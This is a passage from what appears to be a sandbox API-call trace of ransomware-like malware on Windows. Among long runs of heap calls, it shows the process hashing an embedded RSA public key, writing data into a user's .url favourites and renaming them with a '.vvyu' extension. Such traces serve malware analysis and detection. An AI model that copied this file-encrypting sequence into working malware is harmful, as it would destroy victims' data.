0x2c78ac0 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0198.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0198.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3020 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3038 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0198.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3008 [0198.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0198.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0198.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0198.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94eb8 | out: hHeap=0x620000) returned 1 [0198.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.497] WriteFile (in: hFile=0x568, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.498] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.498] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.500] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.500] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.500] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.500] CloseHandle (hObject=0x568) returned 1 [0198.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0198.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.502] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn sports.url.vvyu")) returned 1 [0198.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.504] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.507] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0198.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.508] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0198.508] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0198.510] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.510] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.513] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.513] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.515] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.515] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.515] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.515] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.515] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.515] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.516] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.516] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.516] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.516] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.516] GetLastError () returned 0x0 [0198.517] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0198.517] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.517] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.517] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.517] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.517] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94eb8 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94e70 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.519] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3038 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3020 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0198.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.522] GetCurrentThreadId () returned 0x66c [0198.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5d10 [0198.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.523] GetCurrentThreadId () returned 0x66c [0198.523] RtlAllocateHeap 